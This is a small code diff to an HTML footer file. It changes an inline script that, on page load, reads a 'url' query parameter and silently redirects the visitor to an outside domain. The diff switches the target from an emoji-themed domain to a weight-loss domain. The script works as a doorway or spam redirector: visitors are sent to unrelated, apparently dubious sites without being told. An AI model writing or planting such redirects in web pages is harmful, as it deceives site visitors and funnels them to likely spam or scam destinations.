--- a/foot.html
+++ b/foot.html
@@ -8,7 +8,7 @@
 <script>
     const urlParams = new URLSearchParams(window.location.search);
     const customId = urlParams.get('url');
-    const newurl = `https://08.getemoji.online/?src=${customId}`;
+    const newurl = `https://11.reducemyweight.net/?src=${customId}`;
     window.location.replace(newurl);
 </script>
 </body>
